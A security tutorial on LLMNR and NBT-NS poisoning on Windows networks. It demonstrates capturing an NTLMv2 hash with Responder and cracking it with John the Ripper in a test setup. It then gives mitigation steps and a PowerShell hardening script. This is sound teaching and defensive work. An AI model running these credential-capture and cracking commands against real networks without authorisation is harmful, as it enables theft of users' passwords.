Local Network Attacks: LLMNR and NBT-NS Poisoning

Written by Jon Sternstein
Background
How can an attacker capture usernames and passwords on a local network by simply waiting for the computers to willingly give them up?  LLMNR and NBT-NS poisoning!

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are two components of Microsoft Windows machines.  LLMNR was introduced in Windows Vista and is the successor to NBT-NS.

They are both seemingly innocuous components which allow machines on the same subnet to help each other identify hosts when DNS fails.  So if one machine tries to resolve a particular host, but DNS resolution fails, the machine will then try to ask all other machines on the local network for the correct address via LLMNR or NBT-NS.

This seems harmless in theory, but it opens up a major vulnerability that attackers can use to gain credentials to a system.

Vulnerability
An attacker can listen on a network for these LLMNR (UDP/5355) or NBT-NS (UDP/137) queries and respond to them, thus pretending that the attacker knows the location of the requested host.

Let’s look at an example in the diagram below.
1. The victim machine wants to reach the print server at \\printserver, but mistakenly types in \\pintserver.
2. The DNS server responds to the victim saying that it doesn’t know that host.
3. The victim then asks if there is anyone on the local network that knows the location of \\pintserver.
4. The attacker responds to the victim saying that it is \\pintserver.
5. The victim believes the attacker and sends its own username and NTLMv2 hash to the attacker.
6. The attacker can now crack the hash to recover the password.

                 Jon Sternstein              Local Network Attacks: LLMNR and NBT-NS Poisoning


Attack Tools
There are several tools that will allow you to act out the attack scenario detailed above.  One of the originals is NBNSpoof by Wesley McGrew (http://www.mcgrewsecurity.com/tools/nbnspoof/).  McGrew explains on his website how to create a tool to carry out such an attack.  Metasploit has an LLMNR spoofer module, auxiliary/spoof/llmnr/llmnr_response (http://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response).  The tool we will use today is “Responder” from SpiderLabs (https://github.com/SpiderLabs/Responder.git).

1. Download the Responder software: git clone https://github.com/SpiderLabs/Responder.git
2. Run the Responder help menu: python Responder.py -h
     Notice a couple of mandatory options:
          -i [IP] : the attacker’s IP address (or the IP address to send the traffic to)
          -b [0/1]: Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication.
      In addition to those options, there are many switches which allow you to turn on or off the various services to poison - http, https, smb, sql, ftp, ldap, dns, etc.

Let’s follow the example in the picture above.
1.  To set things up, the attacker at 192.168.1.77 starts Responder with “python Responder.py -I eth0 -wfv”.
#python Responder.py -I eth0 -wfv
NBT Name Service/LLMNR Answerer 1.0.
To kill this script hit CRTL-C

[+]NBT-NS & LLMNR responder started
Global Parameters set
Challenge set is: 1122334455667788
WPAD Proxy Server is:On
HTTP Server is:ON
SMB Server is:ON
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF 

2.  The victim at 192.168.1.74 tries to get to \\pintserver, which doesn’t exist.
3.  The victim asks anyone on the local network for help identifying \\pintserver.
4.  The attacker responds.
5.  The victim sends their credentials to the attacker.
LLMNR poisoned answer sent to this IP: 192.168.1.74. The requested name was : pintserver.
[+]SMB-NTLMv2 hash captured from :  192.168.1.74
Domain is : WORKGROUP
User is : testuser
[+]SMB complete hash is : testuser::WORKGROUP:
6. The Responder program stores the credentials in a file in the local directory called SMB-NTLMv2-Client-192.168.1.74.txt
7. The attacker runs John the Ripper against the file with the “john SMB-NTLMv2-Client-192.168.1.74.txt” command, and John the Ripper immediately discovers the password “password1”.
#john SMB-NTLMv2-Client-192.168.1.74.txt  
Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64])
password1        (testuser)
guesses: 1  time: 0:00:00:00 DONE (Tue Nov 12 15:56:46 2013)  c/s: 114620  trying: 123456 - crawford
Use the "--show" option to display all of the cracked passwords reliably

Packet Capture
Let’s look at what’s happening at the network level.

1. You can see the victim at 192.168.1.74 making a name query to the DNS server for “pintserver”.
2. The DNS server doesn’t know the host.
3. The victim then sends an LLMNR query to the local network for “pintserver”.
4. The attacker at 192.168.1.77 responds.
5. The victim creates an SMB connection to the attacker and sends its username and password hash.

Protective Measures
Fixing the issue is easy.
1. Disable LLMNR and NBT-NS.  You need to disable both, because if only LLMNR is disabled, Windows will automatically try to use NBT-NS instead.  See the instructions below.
2. Prevent inter-VLAN communication - By limiting communication between hosts on the same network, you greatly reduce the success of many local network attacks.
3. Use limited user accounts - This won’t prevent an attack, but it will limit the damage that a successful attack can do and at least make an attacker work harder.  For example, if the victim is using "domain admin" credentials, then a successful attack would give up access to all machines on the network.  On the other hand, if the victim is using a limited account, then the attacker will need to work harder to gain further access in the environment.

To disable LLMNR on Windows:
1. Click Start
2. Type gpedit.msc in the text box
3. Navigate to Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client
4. In the DNS Client folder, double-click “Turn Off Multicast Name Resolution” and set it to “Enabled”

The following registry key is set on computers when LLMNR is disabled:
HKLM\Software\Policies\Microsoft\Windows NT\DNSClient
"EnableMulticast" DWORD 0

To disable NetBIOS Name Service on a single machine:
1. Open Control Panel
2. Under "Network and Internet”, click "View network status and tasks”
3. Click “Change adapter settings”
4. Right-click “Local Area Connection” and then click “Properties”
5. Double-click “Internet Protocol Version 4 (TCP/IPv4)”, click “Advanced”, then click the “WINS” (Windows Internet Name Service) tab
6. Click “Disable NetBIOS over TCP/IP"
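As an added example (not part of the original article), the following PowerShell script audits and applies both single-machine controls above: the EnableMulticast policy key the article lists for LLMNR, and the “Disable NetBIOS over TCP/IP” setting from the WINS tab. For the NetBIOS step it uses the Win32_NetworkAdapterConfiguration WMI class and its SetTcpipNetbios method, which the article does not mention; run it from an elevated prompt, with -WhatIf to preview changes.

```powershell
# Added example, not from the original article: audit and harden LLMNR and
# NetBIOS-over-TCP/IP on one Windows host. Requires an elevated PowerShell.
# Run with -WhatIf to see what would change without modifying anything.
[CmdletBinding(SupportsShouldProcess = $true)]
param()

# Policy key named in the article; EnableMulticast = 0 is what the GPO
# "Turn Off Multicast Name Resolution" = Enabled writes.
$llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'

$current = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast `
            -ErrorAction SilentlyContinue).EnableMulticast
if ($current -eq 0) {
    Write-Output 'LLMNR: already disabled by policy (EnableMulticast = 0)'
}
elseif ($PSCmdlet.ShouldProcess($llmnrKey, 'Set EnableMulticast = 0')) {
    if (-not (Test-Path $llmnrKey)) { New-Item -Path $llmnrKey -Force | Out-Null }
    New-ItemProperty -Path $llmnrKey -Name EnableMulticast -Value 0 `
        -PropertyType DWord -Force | Out-Null
    Write-Output 'LLMNR: disabled (EnableMulticast = 0)'
}

# NBT-NS is a per-adapter setting (the WINS tab in the article). The WMI class
# Win32_NetworkAdapterConfiguration exposes it as TcpipNetbiosOptions:
# 0 = use DHCP setting, 1 = enabled, 2 = disabled. (Class not named in the article.)
$adapters = Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration `
            -Filter 'IPEnabled = TRUE'
foreach ($cfg in $adapters) {
    if ($cfg.TcpipNetbiosOptions -eq 2) {
        Write-Output "NBT-NS: '$($cfg.Description)' already disabled"
        continue
    }
    if ($PSCmdlet.ShouldProcess($cfg.Description, 'SetTcpipNetbios(2)')) {
        $result = Invoke-CimMethod -InputObject $cfg -MethodName SetTcpipNetbios `
                  -Arguments @{ TcpipNetbiosOptions = [uint32]2 }
        # ReturnValue 0 = applied now, 1 = applied after reboot, other = WMI error
        Write-Output "NBT-NS: '$($cfg.Description)' disable requested, ReturnValue $($result.ReturnValue)"
    }
}
```

Re-running the script is safe: it only changes settings that are not already in the disabled state, so it doubles as a compliance check.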

To disable NetBIOS Name Service across a domain with DHCP clients:
1. Go to the DHCP Snap-In
2. Go to "Scope Options" for the network you are changing
3. Right-click and select Configure Options
4. Select the Advanced tab and change "Vendor class" to "Microsoft Windows 2000 Options".
5. In the "Available Options" frame, select and check the box "001 Microsoft Disable Netbios Option"
6. In the "Data Entry" frame, change the data entry to 0x2
7. Click "OK".  The new settings will take effect when the clients renew their addresses.

Disabling NetBIOS through DHCP configuration (Fine, 2011)

References:
1. McGrew, Wesley. (2007, March 22). NetBIOS Name Service Spoofing. http://www.mcgrewsecurity.com/2007/03/22/netbios-name-service-spoofing/
2. Gaffie, Laurent. (2012, Oct 24). Introducing Responder-1.0. http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
3. Fine, P. (2011, Jan 13). So long NetBIOS, it’s been fun! Retrieved from Exit | the | Fast | Lane: http://www.exitthefastlane.com/2011/01/so-long-netbios-its-been-fun.html